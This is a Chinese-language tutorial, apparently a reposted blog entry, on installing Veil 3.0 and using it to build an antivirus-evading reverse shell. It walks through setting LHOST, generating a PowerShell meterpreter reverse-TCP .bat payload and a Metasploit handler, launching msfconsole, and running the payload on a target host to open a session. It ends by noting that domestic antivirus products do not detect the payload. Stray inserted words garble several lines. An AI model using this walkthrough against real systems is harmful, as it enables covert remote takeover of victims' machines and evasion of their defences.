最新的Veil3.0的安装和使用

首先安装python

┌─[root@sch01ar]─[~]
└──╼ #cd /sch01ar/Veil/
┌─[root@sch01ar]─[/sch01ar/Veil]
└──╼ #cd setup/
┌─[root@sch01ar]─[/sch01ar/Veil/setup]
└──╼ #./setup.sh -c

 

 在安装过程当中,可能会有一处须要输入msf地址的shell

安装完成bash

若是veil在运行的时候有什么错误,可使用命令删除再运行session

┌─[root@sch01ar]─[~]
└──╼ #rm -rf /root/.config/wine/veil
┌─[root@sch01ar]─[~]
└──╼ #/sch01ar/Veil/setup/setup.sh -c

给Veil权限并打开文件夹tcp

┌─[root@sch01ar]─[/sch01ar]
└──╼ #chmod +x Veil/
┌─[root@sch01ar]─[/sch01ar]
└──╼ #cd Veil/

 若是用python命令打开则会报错工具

┌─[root@sch01ar]─[/sch01ar/Veil]
└──╼ #python Veil.py

 

打开veil3d

┌─[root@sch01ar]─[/sch01ar/Veil]
└──╼ #./Veil.py

 

输入list查看工具列表blog

能够直接回车io

选择1console

回车

输入list查看payload列表

选择22,回车

Veil-Evasion command: use 22

 

设置LHOST

[powershell/meterpreter/rev_tcp>>] set LHOST 192.168.220.134

 生成

[powershell/meterpreter/rev_tcp>>] generate

 

输入文件名称

回车

生成了一个bat文件和msf模块

bat文件目录为

/usr/share/veil-output/source/sch01ar.bat

 msf模块地址

/usr/share/veil-output/handlers/sch01ar.rc

 开启msf监听

┌─[root@sch01ar]─[~]
└──╼ #msfconsole -r /usr/share/veil-output/handlers/sch01ar.rc

 

在目标主机运行bat文件,攻击主机获得反弹的目标主机

输入sessions查看会话

病毒扫描结果

国内的杀软都没有检测出来

相关文章
相关标签/搜索